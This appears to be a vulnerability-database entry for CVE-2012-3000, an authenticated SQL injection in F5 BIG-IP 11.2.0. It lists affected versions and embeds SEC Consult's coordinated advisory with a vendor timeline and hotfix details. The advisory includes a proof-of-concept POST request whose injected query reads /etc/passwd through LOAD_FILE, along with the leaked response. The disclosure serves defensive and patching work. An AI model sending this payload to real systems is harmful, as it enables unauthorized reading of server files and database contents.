ID
VAR-E-201301-0068
CVE
cve_id: | CVE-2012-3000 | Trust: 0.8 |
TITLE
F5 BIG-IP 11.2.0 SQL Injection
Trust: 0.5
DESCRIPTION
F5 BIG-IP versions 11.2.0 and below suffer from a remote SQL injection vulnerability.
Trust: 0.5
AFFECTED PRODUCTS
vendor: | f5 | model: | big-ip | scope: | eq | version: | 11.2.0 | Trust: 0.5 |
vendor: | f5 | model: | big-ip psm | scope: | eq | version: | 11.2 | Trust: 0.3 |
vendor: | f5 | model: | big-ip psm | scope: | eq | version: | 11.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip psm | scope: | eq | version: | 11.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip psm | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip ltm | scope: | eq | version: | 11.2 | Trust: 0.3 |
vendor: | f5 | model: | big-ip ltm | scope: | eq | version: | 11.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip ltm | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip ltm | scope: | eq | version: | 11.1.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip link controller | scope: | eq | version: | 11.2.00 | Trust: 0.3 |
vendor: | f5 | model: | big-ip link controller | scope: | eq | version: | 11.0.00 | Trust: 0.3 |
vendor: | f5 | model: | big-ip link controller | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip link controller | scope: | eq | version: | 11.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip gtm | scope: | eq | version: | 11.2 | Trust: 0.3 |
vendor: | f5 | model: | big-ip gtm | scope: | eq | version: | 11.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip gtm | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip gtm | scope: | eq | version: | 11.1.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip edge gateway | scope: | eq | version: | 11.2 | Trust: 0.3 |
vendor: | f5 | model: | big-ip edge gateway | scope: | eq | version: | 11.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip edge gateway | scope: | eq | version: | 11.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip asm | scope: | eq | version: | 11.2.00 | Trust: 0.3 |
vendor: | f5 | model: | big-ip asm | scope: | eq | version: | 11.0.00 | Trust: 0.3 |
vendor: | f5 | model: | big-ip asm | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip asm | scope: | eq | version: | 11.1.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip apm | scope: | eq | version: | 11.2 | Trust: 0.3 |
vendor: | f5 | model: | big-ip apm | scope: | eq | version: | 11.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip apm | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip apm | scope: | eq | version: | 11.1.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip analytics | scope: | eq | version: | 11.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip analytics | scope: | eq | version: | 11.2 | Trust: 0.3 |
vendor: | f5 | model: | big-ip analytics | scope: | eq | version: | 11.1.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip analytics | scope: | eq | version: | 11.0.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip | scope: | eq | version: | 11.2 | Trust: 0.3 |
vendor: | f5 | model: | big-ip wom | scope: | ne | version: | 11.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip wom | scope: | ne | version: | 10.2.4 | Trust: 0.3 |
vendor: | f5 | model: | big-ip wom | scope: | ne | version: | 10.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip wom | scope: | ne | version: | 11.3.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip webaccelerator | scope: | ne | version: | 9.4.80 | Trust: 0.3 |
vendor: | f5 | model: | big-ip webaccelerator | scope: | ne | version: | 11.3 | Trust: 0.3 |
vendor: | f5 | model: | big-ip webaccelerator | scope: | ne | version: | 11.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip webaccelerator | scope: | ne | version: | 10.2.4 | Trust: 0.3 |
vendor: | f5 | model: | big-ip psm | scope: | ne | version: | 11.3 | Trust: 0.3 |
vendor: | f5 | model: | big-ip psm | scope: | ne | version: | 10.2.4 | Trust: 0.3 |
vendor: | f5 | model: | big-ip psm | scope: | ne | version: | 9.4.8 | Trust: 0.3 |
vendor: | f5 | model: | big-ip psm hf3 | scope: | ne | version: | 11.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip psm hf3 | scope: | ne | version: | 11.2.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip ltm hf3 | scope: | ne | version: | 11.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip ltm hf3 | scope: | ne | version: | 11.2 | Trust: 0.3 |
vendor: | f5 | model: | big-ip ltm | scope: | ne | version: | 10.2.4 | Trust: 0.3 |
vendor: | f5 | model: | big-ip ltm | scope: | ne | version: | 9.4.8 | Trust: 0.3 |
vendor: | f5 | model: | big-ip ltm | scope: | ne | version: | 11.3.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip link controller | scope: | ne | version: | 9.4.80 | Trust: 0.3 |
vendor: | f5 | model: | big-ip link controller | scope: | ne | version: | 11.3 | Trust: 0.3 |
vendor: | f5 | model: | big-ip link controller hf3 | scope: | ne | version: | 11.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip link controller hf3 | scope: | ne | version: | 11.2 | Trust: 0.3 |
vendor: | f5 | model: | big-ip link controller | scope: | ne | version: | 10.2.4 | Trust: 0.3 |
vendor: | f5 | model: | big-ip gtm | scope: | ne | version: | 11.3 | Trust: 0.3 |
vendor: | f5 | model: | big-ip gtm hf3 | scope: | ne | version: | 11.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip gtm | scope: | ne | version: | 10.2.4 | Trust: 0.3 |
vendor: | f5 | model: | big-ip gtm | scope: | ne | version: | 9.4.8 | Trust: 0.3 |
vendor: | f5 | model: | big-ip gtm hf3 | scope: | ne | version: | 11.2.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip edge gateway | scope: | ne | version: | 11.3 | Trust: 0.3 |
vendor: | f5 | model: | big-ip edge gateway hf3 | scope: | ne | version: | 11.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip edge gateway hf3 | scope: | ne | version: | 11.2 | Trust: 0.3 |
vendor: | f5 | model: | big-ip edge gateway | scope: | ne | version: | 10.2.4 | Trust: 0.3 |
vendor: | f5 | model: | big-ip asm | scope: | ne | version: | 9.4.80 | Trust: 0.3 |
vendor: | f5 | model: | big-ip asm hf2 | scope: | ne | version: | 11.2.00 | Trust: 0.3 |
vendor: | f5 | model: | big-ip asm | scope: | ne | version: | 10.2.40 | Trust: 0.3 |
vendor: | f5 | model: | big-ip asm | scope: | ne | version: | 11.3.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip asm hf3 | scope: | ne | version: | 11.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip apm | scope: | ne | version: | 10.2.4 | Trust: 0.3 |
vendor: | f5 | model: | big-ip apm | scope: | ne | version: | 11.3.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip apm hf3 | scope: | ne | version: | 11.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip apm hf3 | scope: | ne | version: | 11.2.0 | Trust: 0.3 |
vendor: | f5 | model: | big-ip analytics | scope: | ne | version: | 11.3 | Trust: 0.3 |
vendor: | f5 | model: | big-ip analytics hf3 | scope: | ne | version: | 11.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip analytics hf3 | scope: | ne | version: | 11.2 | Trust: 0.3 |
vendor: | f5 | model: | big-ip hf3 | scope: | ne | version: | 11.2.1 | Trust: 0.3 |
vendor: | f5 | model: | big-ip hf3 | scope: | ne | version: | 11.2 | Trust: 0.3 |
EXPLOIT
SEC Consult Vulnerability Lab Security Advisory < 20130122-1 >
=======================================================================
title: SQL Injection
product: F5 BIG-IP
vulnerable version: <=11.2.0
fixed version: 11.2.0 HF3
11.2.1 HF3
CVE number: CVE-2012-3000
impact: Medium
homepage: http://www.f5.com/
found: 2012-09-03
by: S. Viehböck
SEC Consult Vulnerability Lab
https://www.sec-consult.com
=======================================================================
Vendor/product description:
---------------------------
"The BIG-IP product suite is a system of application delivery services that
work together on the same best-in-class hardware platform or software virtual
instance. From load balancing and service offloading to acceleration and
security, the BIG-IP system delivers agilityand ensures your applications
are fast, secure, and available."
URL: http://www.f5.com/products/big-ip/
Vulnerability overview/description:
-----------------------------------
A SQL injection vulnerability exists in a BIG-IP component. This enables an
authenticated attacker to access the MySQL database with the rights of MySQL
user "root" (= highest privileges).
Furthermore an attacker can access files in the file system with the rights of
the "mysql" OS user.
Proof of concept:
-----------------
The following exploit shows how files can be extracted from the file system:
POST /sam/admin/reports/php/saveSettings.php HTTP/1.1
Host: bigip
Cookie: BIGIPAuthCookie=*VALID_COOKIE*
Content-Length: 119
{
"id": 2,
"defaultQuery": "XX', ext1=(SELECT MID(LOAD_FILE('/etc/passwd'),0,60)) --
x" }
Note: target fields are only VARCHAR(60) thus MID() is used for extracting
data.
A request to /sam/admin/reports/php/getSettings.php returns the data:
HTTP/1.1 200 OK
...
{success:true,totalCount:1,rows:[{"id":"2","user":"admin","defaultQuery":"XX","ext1":"root:x:0:0:root:\/root:\/bin\/bash\nbin:x:1:1:bin:\/bin:\/sbin\/nol","ext2":""}]}
Vulnerable / tested versions:
-----------------------------
The vulnerability has been verified to exist in the F5 BIG-IP version 11.2.0.
Successful exploitation was possible with Application Security (ASM) or Access
Policy (APM) enabled.
Vendor contact timeline:
------------------------
2012-10-04: Sending advisory draft and proof of concept.
2012-11-21: Vendor announces that fix will be provided with 11.2.0 HF3 and
11.2.1 HF3.
2013-01-22: SEC Consult releases coordinated security advisory.
Solution:
---------
Update to 11.2.0 HF3 or 11.2.1 HF3.
Workaround:
-----------
No workaround available.
Advisory URL:
--------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Unternehmensberatung GmbH
Office Vienna
Mooslackengasse 17
A-1190 Vienna
Austria
Tel.: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 25
Mail: research at sec-consult dot com
www.sec-consult.com
EOF S. Viehböck / @2013
Trust: 0.5
EXPLOIT HASH
LOCAL | SOURCE | ||||||||
|
|
Trust: 0.5
PRICE
free
Trust: 0.5
TYPE
sql injection
Trust: 0.5
TAGS
tag: | exploit | Trust: 0.5 |
tag: | remote | Trust: 0.5 |
tag: | sql injection | Trust: 0.5 |
CREDITS
S. Viehbock
Trust: 0.5
EXTERNAL IDS
db: | NVD | id: | CVE-2012-3000 | Trust: 0.8 |
db: | PACKETSTORM | id: | 119739 | Trust: 0.5 |
db: | BID | id: | 57500 | Trust: 0.3 |
REFERENCES
url: | https://nvd.nist.gov/vuln/detail/cve-2012-3000 | Trust: 0.5 |
url: | http://www.f5.com/products/big-ip/ | Trust: 0.3 |
url: | https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20130122-1_f5_big-ip_sql_injection_v10.txt | Trust: 0.3 |
url: | http://support.f5.com/kb/en-us/solutions/public/14000/100/sol14154.html | Trust: 0.3 |
SOURCES
db: | BID | id: | 57500 |
db: | PACKETSTORM | id: | 119739 |
LAST UPDATE DATE
2022-07-27T10:03:19.681000+00:00
SOURCES UPDATE DATE
db: | BID | id: | 57500 | date: | 2015-03-19T08:21:00 |
SOURCES RELEASE DATE
db: | BID | id: | 57500 | date: | 2013-01-22T00:00:00 |
db: | PACKETSTORM | id: | 119739 | date: | 2013-01-22T23:57:22 |